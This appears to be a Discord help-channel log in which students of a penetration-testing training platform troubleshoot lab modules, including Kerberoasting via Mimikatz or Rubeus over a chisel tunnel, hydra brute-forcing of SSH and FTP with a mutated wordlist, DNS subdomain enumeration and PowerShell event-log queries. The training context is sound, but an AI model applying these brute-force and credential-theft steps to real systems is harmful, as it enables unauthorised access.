let me make a note of this , the question might need to be re-worded. It's possible I'm being a dummy but I can't connect to any smb share as htb-student, or ftp, or anonymous ftp . So not sure what other file transfer method we have, besides RDPing into the box

fathom pendant
#

so yeah; wording

west canopy
#

roger that . Give me a bit and ill get it updated 💪

fathom pendant
#

note: winrm doesn't work either

west canopy
#

neithe does mysql

#

🥹

fathom pendant
#

i blame g0blin

astral beacon
#

Bob may use weak password

#

I still can't guess them

fathom pendant
#

What module/section?

#

(Have you tried Welcome1)?

cloud urchin
west canopy
astral beacon
#

It realized that there still bunch I doesn't try

#

I just find it funny

cloud urchin
fathom pendant
cloud urchin
fathom pendant
#

Sure since I'm lost on context anyway lol

wary plover
karmic mantle
#

For anyone that's done the Advanced XSS module. In the Skills Assessment, is the "Deliver to Victim" feature in the exploitserver.htb used?

cloud urchin
#

yeah

karmic mantle
uneven oracle
#

I’m trying to follow along with the exercises in the Linux fundamentals module, but it says I’m not in the sudoers file and that I will be reported to the authorities… 🫤

distant island
uneven oracle
distant island
#

can some one help me with this Broken Authentication/Brute Forcing Passwords

fiery berry
stuck pier
#

Another day to remind y’all that I’m stuck, Debug the attached binary to find the flag being pushed to the stack, here I have gotten a lot of flag in the given code but none was correct, pls if you have pass intro to assembly language I need help pls

#

I disas the binary code analyses the flag and use gpt to convert the hex value of flag being pushed to stack to flag yet none its correct, is try submitting the hex value direct yet im getting incorrect pls i need help if. You have. Done this module, this it’s the final module on my soc analyst p requisite path

inland shoal
#

for the skills assesment in DFIR module, is there an easy way to analyze the json file for suspicious processes?

#

the question Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe

silver iris
#

In "SOCKS5 Tunneling with Chisel" from "Pivoting, Tunneling, and Port Forwarding" when i compile chisel it uses a newer version of GLIBC, wich is not present on the pivothost. What is a good way to resolve this? I cant update the GLIBC version on the pivothost. Is there a way to build it in an older version?

distant island
fathom pendant
inland shoal
soft cedar
#

Try version 1.74 or downwards

silver iris
distant island
fathom pendant
gray chasm
#

I am in a computer connected to a domain, I have shown the users to which you can apply a kerberoasting with powerview, the thing is that I do not have the password in clear text of the local administrator user of the computer to which I am connected, this same thing can be done from my Kali machine with GetUserSPNs?

Because I don't have valid credentials for any domain user at the moment.

#

From my kali I don't have direct communication with the DC, but I have an open tunnel with chisel.

fathom pendant
#

Even indirect communication, it's reaching the DC somehow

fathom pendant
gray chasm
fathom pendant
#

¯_(ツ)_/¯

#

Without context of the module or section you're doing I have 0 idea what you're referring to

#

You have a chisel set up, how did you manage that?

gray chasm
#

ACTIVE DIRECTORY ENUMERATION & ATTACKS -----> AD Enumeration & Attacks - Skills Assessment Part I

fathom pendant
#

You can get domain creds; many tools you can use

#

Just because it's not a fully interactive shell doesn't mean some tools can't be run

gray chasm
#

To kerberoasting from my Kali, I would need credentials of a domain user.

fathom pendant
#

Either way. There's a tool you can use on the Web01 host

gray chasm
#

Mimikatz or rubeus

fathom pendant
#

They both should work

#

Though with mimikatz you may need to pass the commands through as mimikatz "command" "exit"

gray chasm
fathom pendant
gray chasm
fathom pendant
#

Perhaps

#

I'm not entirely sure how it works through the pivot ¯_(ツ)_/¯

soft cedar
gray chasm
# soft cedar Yes and through pivoting.

Okay, of course, since I am on a computer joined to the domain as nt-authority system, I do not need credentials from a domain user, because I am a user with maximum privileges and that is why Kerberoasting can be applied, right?

naive shell
#

I'm doing "Using CrackMapExec" with "NetExec" - does anybody know where the modules are stored when installing with pipx?

fathom pendant
#

¯_(ツ)_/¯

#

But there is official instructions on installing netexec on their wiki and gh iirc

upper ruin
#

Try to repeat what you learned so far to find more files/directories. One of them should give you a flag. What is the content of the flag?

naive shell
#

Yeah, I know, I mean I know where the modules should be, as they are in the /nxc folder in their repo, but can't find them after installing - and I don't find any documentation on it. big_think_onion

rustic sage
#

birdman

fathom pendant
#

<@&861185840277487616>

rustic sage
#

Okay sorry

naive shell
#

lol

fathom pendant
#

Wrong place dude

rustic sage
#

Where can I apply?

fathom pendant
#

Read the #rules no advertising your company ffs

rustic sage
#

LOL MY BAD HOMIE

#

it's 4 am in Thailand

fathom pendant
#

Also you're in probably the worst channel for finding any "professionals"

#

Not to mention AI = instant L

#

Don't dm me

winged hedge
#

Thanks Marcie!

distant island
#

can some one help me with this Broken Authentication/Brute Forcing Passwords

naive shell
#

Ok, found it...: ~/.nxc/modules 🙄

fathom pendant
#

I never worried about it bc I never needed to go into the nxc modules folder ¯_(ツ)_/¯

naive shell
#

Fair enough - I was just wondering, as they are talking about custom modules in the "Using CrackMapExec" module.

#

Although I found it, it's empty, lol.

#

Anyway, thanks.

fathom pendant
#

Probably because it's for use with custom modules and default modules are loaded in a different section

naive shell
#

Yeah, I think it's symlinked. 🤔

distant island
upper ruin
fathom pendant
fathom pendant
plush urchin
fathom pendant
#

The target labs don't have internet access

#

You'll need to first download it on your attack machine, then copy to target

#

Also generally with gh stuff you wanna do git clone <repo>

#

For free accounts: there's limited internet access on the in-browser pwnbox

plush urchin
fathom pendant
#

But steps are;
Download to attack box -> run a share service [i.e. python3 http.service module] -> the target

distant island
plush urchin
fathom pendant
fathom pendant
plush urchin
#

it is not working

fathom pendant
#

Iirc you can access git and some other websites on the in-browser vm [pwnbox]

#

Would be the github repo

#

Raw is literally raw code

#

If all else fails, go to the raw page -> ctrl+A -> ctrl+C -> in pwnbox open a text editor and paste

#

Then save, and follow the upload steps

upper ruin
fathom pendant
upper ruin
#

Ah.

civic cipher
#

Why I can't use the general off topic channel?

distant island
fathom pendant
storm elk
# distant island .

So what part exactly do you need help with? the rate limit or the bruteforce bit?

plush urchin
#

ok now, i am on the nibbles box here - https://app.hackthebox.com/machines/121.

i have spawned the target ip and started the pwnbox but i am getting WARNING: No targets were specified, so 0 hosts scanned. after scanning the target IP with nmap

fathom pendant
#

no targets specified

#

Means you didn't provide an IP or host to scan

young flume
#

BROKEN AUTHENTICATION | Brute Forcing Passwords is some can help please?

distant island
young flume
#

yeah i am doing it 3 days

young flume
#

am already sorted all passwords

distant island
young flume
#

yeah bro how did you solved this?

vague sage
#

SSH to 10.129.204.9 with user "user2" and password ""

whats the password supposed to be dude
i tried just pressing enter

#

i tried pressing space

#

whaaa

vague sage
#

oh

#

thank you

fathom pendant
#

This is true for all questions in this section except the first ofc

vague sage
#

yeah got it
thanks man

young flume
fathom pendant
#

He hasn't completed it yet

vague sage
#

whats the "ls" command for windows

#

dir?

fathom pendant
#

yes

#

though for one of the questions you're best to be in a powershell session; and doing a recursive search. plenty of sources online to figure it out

vague sage
#

ye im on user4 question
User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them.

#

so many flags.txt
how am i gonna check them all

fathom pendant
civic dawn
#

Hi everyone, currently I’m at PASSWORD ATTACKS module

Password Mutations

Does it natural for password cracking to get slower and slower ? start from 14:38h to 110:56h

I waited more than one hour

vague sage
#

i think i got it

fathom pendant
vague sage
#

oh thank you

fathom pendant
#

at least to get you started with the powershell, you might need a bit more digging to be able to search for size

#

i believe -neq is a comparator in powershell for not equal

vague sage
#

ill check it out
thanks for the help

fathom pendant
#

sorry it's ne

vague sage
#

-ne?

fathom pendant
#

you can also use -gt for greater than zero

distant island
fathom pendant
#

i believe length of an item is Object.Length in powershell

#

so $_.length in the case of a recursive search with multiple items

#

and of course ? (or where-Object)

#

here's a list of common and default powershell aliases

#

as a lot of resources online will use the common aliases for items

finite shuttle
fathom pendant
vague sage
#

Get-ChildItem is that not a PS command??

#

it doesnt recognize it

next bronze
#

it is

vague sage
#

well its not being recognized for some reason

nova idol
#

How long does university enroll take time

next bronze
#

are you in cmd?

fathom pendant
#

^

vague sage
# next bronze are you in cmd?

nah
i pressed on the powershell promt through the workstation and
doesnt it autmatically connect you to the PS promt when you connect via your own vm?

fathom pendant
#

if your shell prompt doesn't have PS in front, and you're in a Windows env, you're in CMD

vague sage
#

ah

#

ah i thought i was in PS

fathom pendant
#

format would be PS $CD>

#

so like PS C:\Users\LOL\>

vague sage
#

yeah i get you

random tendon
#

Hi. Quick question: If I buy a platinum subscription, do I instantly receive 1000 cubes?

fathom pendant
#

to drop into powershell, just type powershell

vague sage
#

looks like im not then
my bad xd

fathom pendant
random tendon
#

Thank you 🙂 So I dont have to earn the cubes? I just instantly receive them?

fathom pendant
#

correct

random tendon
#

Thanks!

fathom pendant
#

then the following month around the same date; if you haven't unsubscribed, you get another 1k cubes

random tendon
#

Amazing!

vague sage
fathom pendant
#

PS prompt in the PWNbox (in-browser vm) is not gonna be the same env as the one native to windows

next bronze
#

there's a ps prompt in pwnbox?

fathom pendant
#

yes it's next to the bash terminal

vague sage
#

oh i see thanks again

rich zephyr
#

Hi, is here the right place to ask for a little hint for the JerryTok web challenge? Cannot find the challenges discord room 🙂

fathom pendant
rich zephyr
#

Oh, okay, thanks

tight osprey
#

Query on mod: FILE TRANSFERS - Windows File Transfer Methods Q2:

"Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box".

Reading this seems like no RDP prior to the upload of the file yet the methodology from the room requires access to the machine via RDP to the target to download. Is this poorly worded or am I interpreting it incorrectly?

civic dawn
vague sage
#

Use the tasklist command to print running processes and then sort them in reverse order by name. The name of the process that begins with "vm" is the flag for this user.

i used
tasklist /svc | sort /R

i find 2 services that start with vm
vmtoolsd.exe (VMTools)
vm3dservice.exe (vm3dservice)

but none of those are correct
not sure what else to do now

#

oh shit wait wait

#

yeah nvm still need help

next bronze
#

did you try the name?

vague sage
#

yeah ive tried
VMTools
vmtoolsd
toolsd
tools
vm3dservice
3dservice

#

even with .exe

#

like everything
but its still wrong

next bronze
#

the image name

vague sage
#

yeah

#

im going through them again rn
nothing works

#

im most likely missing something

#

OH NVM

#

i thought i tried vmtoolsd.exe but i havent

#

my bad
thank you xd

glacial bay
#

Okay I am on Footprinting > DNS. Stuck on the last question. What is the FQDN of the host where the last octet ends with "x.x.x.203"?

I have literally used every list within Seclist and n0kovo_subdomains

My command dnsenum --dnsserver 10.129.229.61 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

Cannot find .203

#

The hint is Remember that different wordlists do not always have the same entries. which is totally what i have been doing

dim wolf
fathom pendant
glacial bay
fathom pendant
#

one of the already discovered subdomains will hold the key to 203

glacial bay
fathom pendant
#

the final answer will be subd1.subd2.inlanefreight.htb

fathom pendant
#

that way if you have a list and let a computer iterate through it, surely you didn't miss the one subdomain

blissful elm
#

always the 0 point question which waste lot of time

#

any hint guys

#

Module: ATTACKING COMMON APPLICATIONS
Section: WordPress - Discovery & Enumeration
Question: Enumerate the host and find a flag.txt flag in an accessible directory.

fathom pendant
#

i mean... it says it in the name, in an accessible directory - so it'll be in a directory you have access to

#

i believe error redirects work the same/similar in CMD/Powershell where you can redirect errors to an error.log file

vague sage
#

man what do i do here

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

#

im not sure what to use

#

i tried Get-ADUser

#

but uhh yeah maybe something with that?

#

what would the filters be and all

fathom pendant
vague sage
#

ive found something about filterhashtables

#

and a weird @{LogName... command

#

imma try it out

fathom pendant
#

considering that event logs are generated in xml, that's what it's drawing from

vague sage
#

o good to know

fathom pendant
#

LogName = the type of log; Security, Audit, Information, Critical

vague sage
#

i thought it was something for me to edit and got hella confused when reading the cheat sheet

fathom pendant
#

ID = the EventID #

#

4625 is the Security Event ID for logon failures

#

also the Domain-Controller is the same as the 172.16... one from an earlier question

vague sage
#

do i have to ssh to that?

#

or doesnt matter

civic dawn
#

How could I create unique list without any duplicate values ?

fathom pendant
viscid horizon
#

Its okay to learn just networking hack the box
With with out network + and ccna

gray merlin
vague sage
#

oooh makes sense now
lemme try again

fathom pendant
#

if you don't connect to the Domain Controller, you won't get the right answer

vague sage
#

im in im in

#

account for which logon failed

marsh echo
vague sage
fathom pendant
vague sage
#

hm

fathom pendant
#

the question is asking for the account with the highest count of consecutive logon failures to the DomainController

vague sage
#

OH

#

lemme go through it again

fathom pendant
#

remember: key being there being logged into the DC

vague sage
#

logon type is where i look at?

vague sage
#

oh btw i executed this

#

Get-WinEvent -MaxEvents 10 -FilterHashTable @{LogName=‘Security’;ID=‘4625’} | fl

fathom pendant
#

don't do -MaxEvents

vague sage
#

found it on google

#

oh nice

#

what does -MaxEvents do?

next bronze
#

I mean.. "max events"

vague sage
#

ye stupid question

fathom pendant
#

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/?view=powershell-7.4 this is a good resource for powershell commandlets to reference if you need more info on them

#

you can search by the cmdlet name and get the full doc info on it

vague sage
#

o

civic dawn
#

Password Attacks Module, Password Mutations Section

Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

I created the mutation list and have more than hour trying to crack the password, how long should take ?

fathom pendant
#

attack one of the other running services

#

should pop in ~30 minutes

civic dawn
#

I’m attacking ftp, is there any faster way to?

fathom pendant
#

ssh is an EXTREMELY slow service to brute

#

using more threads

#

-t 48 is the most stable; default is 16 for hydra on ftp

civic dawn
#

I’m using -t 64

fathom pendant
#

64 can also be unstable and completely skip over the password

#

spoilers

fathom pendant
#

brother just delete it

#

considering it's an answer

vague sage
#

ye xd

fathom pendant
vague sage
#

ah not enough cubes for the next module

fathom pendant
#

definitely scale back your threads

marsh echo
vague sage
civic dawn
fathom pendant
#

yes

fathom pendant
#

maybe try resetting the target and trying again

#

sometimes these can be a bit funky

civic dawn
#

By the way, was the message that pixxelxd has deleted is the password ? Because it doesn’t exist in the list

fathom pendant
#

i don't like ptunnel myself so i couldn't tell you what you did ¯_(ツ)_/¯

fathom pendant
#

it was them working on their own module; the Intro to Windows Command Line module

civic dawn
#

Ok

fathom pendant
#

i'd also scan the target to be sure it's still responsive

#

sometimes terminate then respawn the target makes it work instead of just "reset"

marsh echo
#

I thought it was me who didn't understand the exercise

civic dawn
#

Could I just make hydra continue the list from where it stop instead of restarting?

fathom pendant
civic dawn
#

This will take forever 🫠💔

#

The list too big and the cracking become slower and slower or just lost response and need to restart

fathom pendant
#

I suggest changing vpn regions then

#

It also isn't taking longer the time is just being adjusted as it normalizes the response times

#

As sometimes response times are varied

civic dawn
#

I’m living in Saudi Arabia, unfortunately there no server for ours yet nether Bahrain 🫠💔

So I’m using UK or German depending on ms

fathom pendant
#

It's different from the pwnbox server

#

And yes, it makes a difference

civic dawn
#

Hmmm am I using it wrong ? Please could explain you more

fathom pendant
#

I mean the command is just hydra -l sam -P mutated_passwords.list ftp://ip -t 48

inland shoal
#

anyone knows why? INTRODUCTION TO MALWARE ANALYSIS I ran Powershell with administrator too

inland shoal
rugged pecan
#

HTB Academy - SOC Analyst | Windows Even Logs & Finding Evil | Windows Event Logs

I'm struggling a lot understanding this lesson in an attempt to even answer the questions. WOuld anyone be able to provide any clarity on the questions.

hexed lintel
#

I am doing Hacking Wordpress module
when i try to got to 94.237.63.93:47842/wp-admin
it redirects to 94.237.63.93/wp-admin

#

anyone have solution?

wide river
#

which section

hexed lintel
wide river
hexed lintel
#

nice

#

@wide river visiting /wp-content also redirects

#

In directory indexing section

civic dawn
#

Alright I gave up on vpn and decided to do the task at pwnbox and seems hydra here more stable and speed doesn’t going down and down that hard

wide river
#

i normally run nmap on it too

civic dawn
wide river
torpid cove
#

Guys I'm stuck at the GETTING STARTED module : knowledge check
I have enumerated my target and I searched for possible exploits I can use on Metasploit but everytime I try to run the exploits, I always get "no-access" and I have checked the target website admin page, I don't see where to give access to the admin user, I did see something about the CMS website being an old version and I saw some clue that says to install to latest version and I even downloaded the lasted version and try to host it on my local server, but everytime I visit my local-server on the web, the installer package doesn't load to install, and idk how to directed install the new version on the target website, I'm stuck and don't know what to do

Any clue or hint please???

safe lichen
#

can anyone help with the AD Trust Module ADCS section that I can private message? I can't post screenshots in this channel for some reason

sterile epoch
#

Hi I am having trouble compiling assembly code I get this type of error on unedited resource files

fathom pendant
fathom pendant
#

That's all you need to move forward

#

One of them is, indeed, vulnerable

#

I don't recommend blindly throwing msf at it until you can narrow down versions and plugins

vague sage
#

NotLikeThis what do i do now

#

im missing 20 for the next module

dim wolf
#

you can't do that module then

#

you will have to acquire more cubes or subscribe to a plan that gives you access to more modules

fathom pendant
#

Or find an obscure bug in the platform and ask for a sub

#

¯_(ツ)_/¯

dim wolf
#

"i found a really weird bug where all modules Tier I and above are locked, please fix?"

torpid cove
vague sage
#

ill just hack the website dude (buy a subscription)

torpid cove
short igloo
#

why cant i write in "general"?

vague sage
#

verify i guess idk i dont remember how the server works

#

and if you cant find the channel just go to browse channels and yk

fathom pendant
short igloo
#

thanks

fathom pendant
#

Unless ofc you have an annual or student sub, bc the modules provided by those subs still give you the cube rewards upon task completions

#

But tier 1+ modules only give you 20% of their cost back

torpid cove
fathom pendant
#

You still lose out on cubes

#

You don't gain more cubes

torpid cove
fathom pendant
#

Brother

#

That number doesn't go above your starting point

torpid cove
fathom pendant
torpid cove
fathom pendant
#

Yes, I'm 100% sure

#

The only exceptions to that rule is the annual and student subs

#

Since those grant access to t0-2 modules at no cost

torpid cove
fathom pendant
#

Brother

#

The 20% back is accumulated throughout the module

#

It's not all at once

torpid cove
#

Well idk man, help me with my exercise please??
The knowledge check exercise?

fathom pendant
#

If there's an upload vuln then msf crafts the payload for you, otherwise you can research how it works

#

Iirc it has something to do with themes

torpid cove
torpid cove
worn matrix
#

hello all,i am doing password attacks,i try to bruteforce the ssh with the generated pass list from custom rule and a pass list,but hydra and netexec are doing extremely much time,is it normal? ┌─[parrot@parrot]─[~/Desktop/modules/passattacks/2ndcube]
└──╼ $hydra -L list -P mut_pass.list ssh://10.129.122.249
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-07 18:03:20
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 94044 login tries (l:1/p:94044), ~5878 tries per task
[DATA] attacking ssh://10.129.122.249:22/
[STATUS] 104.00 tries/min, 104 tries in 00:01h, 93943 to do in 15:04h, 13 active
[STATUS] 92.00 tries/min, 276 tries in 00:03h, 93771 to do in 16:60h, 13 active
[STATUS] 82.00 tries/min, 574 tries in 00:07h, 93473 to do in 18:60h, 13 active

GitHub

hydra. Contribute to vanhauser-thc/thc-hydra development by creating an account on GitHub.

fathom pendant
#

The only thing admin creds are used for is to check versions, that's it

fathom pendant
worn matrix
#

yes,with name sam

#

list only have sam inside

fathom pendant
#

You know you can just do -l username right?

#

-l = single username
-L = username list

#

But also, don't attack ssh

worn matrix
#

yes,i learn about it 10 minutes ago

#

so how i find the password?what i bruteforce

fathom pendant
#

Scan the target to see what other services are available

#

Step 0: enumerate

worn matrix
#

i should bruteforce something else you mean

fathom pendant
#

Don't make assumptions based off the questions, often questions will give you an end goal, but there's steps in between

fathom pendant
#

I'm just reading what the error says

sterile epoch
#

its direcly downloaded from resouces and compiled using both nasm and as compilers

#
global _start

section .text
_start:
    mov rax, 2
    mov rcx, 5
loop:
    imul rax, rax
#

this is the code

fathom pendant
#

If you're wondering how to read it, file:n is such that n is the line number where the error lies

worn matrix
#

i really dont know what to bruteforce

#

🙂